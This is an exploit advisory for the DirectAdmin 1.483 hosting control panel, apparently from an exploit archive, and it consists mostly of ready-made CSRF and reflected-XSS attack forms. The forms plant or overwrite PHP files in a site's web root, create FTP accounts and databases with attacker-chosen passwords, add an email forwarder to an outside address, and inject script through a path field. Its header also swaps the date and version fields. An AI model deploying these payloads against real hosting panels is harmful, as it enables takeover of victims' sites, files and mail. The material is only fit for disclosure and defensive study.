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DirectAdmin Web Control Panel 1.483 - Multiple Vulnerabilities
============================================================================= [+] Exploit Title : DirectAdmin Web Control Panel CSRF/XSS vulnerability [+] Exploit Author : Ashiyane Digital Security Team [+] Date : 1.483 [+] Version : 2015/09/08 [+] Tested on : Elementary Os [+] Vendor Homepage : http://www.directadmin.com/ ============================================================================= [+] Introduction : DirectAdmin is a graphical web-based web hosting control panel designed to make administration of websites easier. DirectAdmin suffers from cross site request forgery and cross site scripting vulnerabilities ============================================================================= [+] CMD_FILE_MANAGER : [+] Users : Users are web hosting clients. They use DirectAdmin to configure their web site [+] Exploit 1: Create New File and Edit a file <form name=info action='http://address:port/CMD_FILE_MANAGER' method='POST'> <input type="hidden" name="action" value="edit"> <input type="hidden" name="path" value="/domains/address/public_html"> <input type="hidden" name="text" value="<?php //codes ?>"> <input type="hidden" name="filename" value="index.php"> <input type="submit" onClick="save=0;" value="Save As"> ----------------------------------------------------------------------------- [+] Exploit 2: Create a New Folder <form name=folderform action="/CMD_FILE_MANAGER" method="POST"> <input type="hidden name=action value="folder"> <input type="hidden name="path" value="/domains/iceschool.ir/public_html"> <input type="hidden" name="name" value="Folder"> <input type=submit value="Create"> </form> ----------------------------------------------------------------------------- [+] Exploit 3: Rename a file <form name=info action='http://address:port/CMD_FILE_MANAGER' method='POST'> <input type=hidden name=action value="rename"> <input type="hidden" name="path" value="/domains/address/public_html"> <input type="hidden" name="old" value="Oldname"> <input type="hidden" name="filename" value="Newname"> <input type="hidden" name="overwrite" value="yes"> <input type="submit" value="Rename"> </form> ----------------------------------------------------------------------------- [+] Exploit 4 : Reflected XSS <form name='info' action='http://address:port/CMD_FILE_MANAGER' method='POST'> <input type="hidden" name="action" value="edit"> <input type="hidden" name="path" value='/xss/"><script>alert(/XSS Vuln/)</script>'> <input type="hidden" name="text" value="xss"> <input type="hidden" name="filename" value="xss"> <input type="submit" onClick="save=0;" value="Save As"> </form> ============================================================================= [+] CMD_FTP : [+] Users : Users are web hosting clients. They use DirectAdmin to configure their web site [+] Exploit : Create FTP account <form name="reseller" action="http://address:port/CMD_FTP" method="post"> <input style="display:none" type="text" name="fakeusernameremembered"/> <input style="display:none" type="password" name="fakepasswordremembered"/> <input type="hidden" name="action" value="create"> <input type="hidden" name="domain" value="domain.xyz"> <!-- Example : ashiyane.org --> <input type="hidden" name="user" value="ehsan"> <input type="hidden" name="passwd" value="pass1234"> <input type="hidden" name="passwd2" value="pass1234"> <input type="hidden" name="type" value="domain" checked> <input type="hidden" name="type" value="ftp"> <input type="hidden" name="type" value="user"> <input type="hidden" name="type" value="custom"> <input type="hidden" name="custom_val" value="/home/domain"> <!-- Example : /home/ashiyane --> <input type="submit" name="create" value="Create"> </form> ============================================================================= [+] CMD_DB : [+] Users : Users are web hosting clients. They use DirectAdmin to configure their web site [+] Exploit : Create new Database <form name=reseller action="http://address:port/CMD_DB" method="post"> <input type="hidden" name=action value=create> <input type="hidden" name=domain value="domain.xyz"> <!-- Domain --> <input type="hidden" name="name" value="dbname"> <!-- Database Name --> <input type="hidden" name="user" value="ehsan"> <!-- Username --> <input type="hidden" name="passwd" value="pass1234"> <!-- Password --> <input type="hidden" name="passwd2" value="pass1234"> <!-- Password --> <input type="submit" name="create" value="Create"> </form> ============================================================================= [+] CMD_DB : [+] Users : Users are web hosting clients. They use DirectAdmin to configure their web site [+] Exploit : Create new E-Mail Forwarder <form name=info action="CMD_EMAIL_FORWARDER" method="post"> <input type=hidden name=action value=create> <input type=hidden name=domain value="domain.xyz"><!-- Domain --> <input type="hidden" name="user" value="info"> <!-- Forwarder Name --> <input type="hidden" name="email" value="hehsan979@gmail.com"> <!-- Destination Email --> <input type="submit" name="create" value="Create"> </form> ============================================================================= [+] Discovered By : Ehsan Hosseini (hehsan979@gmail.com) # 0day.today [2024-12-23] #